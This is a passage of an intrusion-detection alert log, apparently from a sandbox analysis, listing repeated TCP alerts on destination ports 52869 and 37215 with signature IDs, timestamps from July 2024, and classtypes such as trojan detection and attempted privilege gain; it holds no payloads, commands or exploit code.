                      Source Port:49210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.456840
                      SID:2027339
                      Source Port:59462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:03.123324
                      SID:2027339
                      Source Port:48428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.084394
                      SID:2027339
                      Source Port:47236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.064615
                      SID:2829579
                      Source Port:48056
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.058977
                      SID:2831300
                      Source Port:42174
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:17.501695
                      SID:2025132
                      Source Port:59350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:18.886041
                      SID:2831300
                      Source Port:42154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:37.871435
                      SID:2025132
                      Source Port:36314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.453622
                      SID:2027339
                      Source Port:49212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.658836
                      SID:2027339
                      Source Port:36372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.663981
                      SID:2027339
                      Source Port:36206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.405139
                      SID:2829579
                      Source Port:34882
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:25.634766
                      SID:2027339
                      Source Port:37148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.531088
                      SID:2831300
                      Source Port:57464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.099234
                      SID:2027339
                      Source Port:47044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.756250
                      SID:2027339
                      Source Port:59504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.429987
                      SID:2835222
                      Source Port:52234
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.704882
                      SID:2025132
                      Source Port:54672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.587244
                      SID:2025132
                      Source Port:48844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.792506
                      SID:2027339
                      Source Port:35532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.412131
                      SID:2835222
                      Source Port:59394
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.830942
                      SID:2027339
                      Source Port:47590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.250145
                      SID:2025132
                      Source Port:51916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:29.771660
                      SID:2025132
                      Source Port:47338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.054227
                      SID:2829579
                      Source Port:37328
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.768266
                      SID:2027339
                      Source Port:48528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.333908
                      SID:2027339
                      Source Port:58008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:26.028529
                      SID:2025132
                      Source Port:51024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.208694
                      SID:2025132
                      Source Port:43618
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.502632
                      SID:2027339
                      Source Port:57490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.678099
                      SID:2025132
                      Source Port:43222
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.179441
                      SID:2027339
                      Source Port:37096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.788274
                      SID:2829579
                      Source Port:52930
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.854779
                      SID:2025132
                      Source Port:44766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.325934
                      SID:2831300
                      Source Port:37940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:50.167569
                      SID:2027339
                      Source Port:41372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.022964
                      SID:2829579
                      Source Port:32904
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.354369
                      SID:2831300
                      Source Port:54188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:33.055161
                      SID:2027339
                      Source Port:56148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.518543
                      SID:2829579
                      Source Port:48012
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.251823
                      SID:2025132
                      Source Port:54006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:21.994838
                      SID:2027339
                      Source Port:57492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.488760
                      SID:2027339
                      Source Port:46054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.824928
                      SID:2027339
                      Source Port:35230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.842190
                      SID:2025132
                      Source Port:55666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.076298
                      SID:2027339
                      Source Port:52106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.223856
                      SID:2025132
                      Source Port:50078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.633205
                      SID:2027339
                      Source Port:53738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.654418
                      SID:2025132
                      Source Port:53024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.568828
                      SID:2027339
                      Source Port:39146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.801547
                      SID:2835222
                      Source Port:48402
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.128245
                      SID:2027339
                      Source Port:49650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:25.985417
                      SID:2027339
                      Source Port:36084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.674364
                      SID:2027339
                      Source Port:32966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.154674
                      SID:2025132
                      Source Port:51264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.060021
                      SID:2835222
                      Source Port:54586
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.556241
                      SID:2027339
                      Source Port:60808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.475330
                      SID:2027339
                      Source Port:43592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.443719
                      SID:2025132
                      Source Port:50650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.584377
                      SID:2025132
                      Source Port:57462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.590112
                      SID:2835222
                      Source Port:48920
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.392392
                      SID:2831300
                      Source Port:47506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:07.479533
                      SID:2027339
                      Source Port:39002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.035057
                      SID:2025132
                      Source Port:41454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.336567
                      SID:2027339
                      Source Port:53436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.859349
                      SID:2835222
                      Source Port:59950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:08:36.040271
                      SID:2025132
                      Source Port:43986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.859348
                      SID:2835222
                      Source Port:51910
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.171817
                      SID:2025132
                      Source Port:34596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:19.817334
                      SID:2025132
                      Source Port:39520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:12.531607
                      SID:2025132
                      Source Port:34616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.361899
                      SID:2025132
                      Source Port:36406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.644108
                      SID:2027339
                      Source Port:47652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.767395
                      SID:2835222
                      Source Port:56288
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.096689
                      SID:2027339
                      Source Port:40626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.771399
                      SID:2829579
                      Source Port:43734
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.457644
                      SID:2831300
                      Source Port:44452
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.533759
                      SID:2835222
                      Source Port:55798
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.963204
                      SID:2025132
                      Source Port:48896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.957724
                      SID:2027339
                      Source Port:52062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.186864
                      SID:2027339
                      Source Port:32832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.771186
                      SID:2025132
                      Source Port:33694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:24.734892
                      SID:2027339
                      Source Port:38668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.058256
                      SID:2835222
                      Source Port:44696
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.568828
                      SID:2027339
                      Source Port:42292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.269253
                      SID:2025132
                      Source Port:32800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.662338
                      SID:2829579
                      Source Port:37482
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.830838
                      SID:2829579
                      Source Port:36374
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.622534
                      SID:2829579
                      Source Port:58744
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.048662
                      SID:2027339
                      Source Port:55032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.531553
                      SID:2829579
                      Source Port:34424
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.405141
                      SID:2831300
                      Source Port:54354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.476346
                      SID:2027339
                      Source Port:41646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.887482
                      SID:2025132
                      Source Port:60012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:21.679115
                      SID:2027339
                      Source Port:40112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.464785
                      SID:2831300
                      Source Port:52716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.204234
                      SID:2027339
                      Source Port:53358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.106701
                      SID:2027339
                      Source Port:52516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:06.283235
                      SID:2025132
                      Source Port:48724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.624711
                      SID:2027339
                      Source Port:56334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.981798
                      SID:2025132
                      Source Port:55274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.173904
                      SID:2025132
                      Source Port:37068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.135703
                      SID:2829579
                      Source Port:40452
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.392754
                      SID:2829579
                      Source Port:48778
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.859779
                      SID:2829579
                      Source Port:53612
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.326086
                      SID:2831300
                      Source Port:54150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.316603
                      SID:2025132
                      Source Port:51362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.642815
                      SID:2025132
                      Source Port:47420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.334876
                      SID:2025132
                      Source Port:39240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.603782
                      SID:2025132
                      Source Port:59396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.692772
                      SID:2027339
                      Source Port:45962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.355766
                      SID:2027339
                      Source Port:50320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.860838
                      SID:2835222
                      Source Port:43764
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.859779
                      SID:2829579
                      Source Port:46084
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.245589
                      SID:2835222
                      Source Port:39622
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:28.937691
                      SID:2025132
                      Source Port:57508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.478181
                      SID:2027339
                      Source Port:56860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.047034
                      SID:2025132
                      Source Port:35394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.442188
                      SID:2025132
                      Source Port:47550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:12.482858
                      SID:2831300
                      Source Port:56524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.207276
                      SID:2025132
                      Source Port:58942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.592874
                      SID:2835222
                      Source Port:42532
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.409134
                      SID:2829579
                      Source Port:59824
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:51.995876
                      SID:2027339
                      Source Port:53002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.245742
                      SID:2829579
                      Source Port:58276
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.799314
                      SID:2027339
                      Source Port:48034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.593936
                      SID:2831300
                      Source Port:58012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.434474
                      SID:2831300
                      Source Port:50436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:23.212855
                      SID:2025132
                      Source Port:53734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.354200
                      SID:2025132
                      Source Port:56578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.685214
                      SID:2829579
                      Source Port:43156
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.671976
                      SID:2025132
                      Source Port:49438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.517011
                      SID:2027339
                      Source Port:57116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.777005
                      SID:2829579
                      Source Port:39672
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.502632
                      SID:2831300
                      Source Port:47904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.403603
                      SID:2027339
                      Source Port:45274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.791787
                      SID:2027339
                      Source Port:53084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.129772
                      SID:2835222
                      Source Port:51998
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.067591
                      SID:2829579
                      Source Port:42576
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.941781
                      SID:2027339
                      Source Port:58728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.788274
                      SID:2829579
                      Source Port:53940
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.955037
                      SID:2027339
                      Source Port:38392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.394049
                      SID:2831300
                      Source Port:42816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.551205
                      SID:2027339
                      Source Port:46816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.554912
                      SID:2835222
                      Source Port:58870
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.659617
                      SID:2835222
                      Source Port:58576
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.106041
                      SID:2835222
                      Source Port:46868
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.078658
                      SID:2027339
                      Source Port:53476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.134564
                      SID:2835222
                      Source Port:53132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.528851
                      SID:2027339
                      Source Port:52672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.509551
                      SID:2831300
                      Source Port:37036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:38.250934
                      SID:2025132
                      Source Port:35488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.324524
                      SID:2829579
                      Source Port:40050
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.476168
                      SID:2831300
                      Source Port:55692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.575244
                      SID:2027339
                      Source Port:47740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.974933
                      SID:2027339
                      Source Port:40242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.545166
                      SID:2831300
                      Source Port:42944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.143841
                      SID:2027339
                      Source Port:47462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:15.422064
                      SID:2025132
                      Source Port:42644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.443720
                      SID:2831300
                      Source Port:45270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.469321
                      SID:2831300
                      Source Port:47036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.537576
                      SID:2829579
                      Source Port:35726
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.137886
                      SID:2831300
                      Source Port:59526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.581239
                      SID:2831300
                      Source Port:40642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.570834
                      SID:2027339
                      Source Port:42140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.323670
                      SID:2829579
                      Source Port:57526
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.971446
                      SID:2027339
                      Source Port:57892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.462432
                      SID:2027339
                      Source Port:48576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.378832
                      SID:2829579
                      Source Port:57690
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.439167
                      SID:2829579
                      Source Port:42722
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.417625
                      SID:2025132
                      Source Port:52328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:45.817352
                      SID:2025132
                      Source Port:53046
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.180899
                      SID:2829579
                      Source Port:38500
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.929180
                      SID:2027339
                      Source Port:57434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.030071
                      SID:2831300
                      Source Port:53492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:44.320022
                      SID:2025132
                      Source Port:38678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:23.270832
                      SID:2831300
                      Source Port:36350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.476343
                      SID:2831300
                      Source Port:49720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.346978
                      SID:2831300
                      Source Port:39144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.467144
                      SID:2025132
                      Source Port:59408
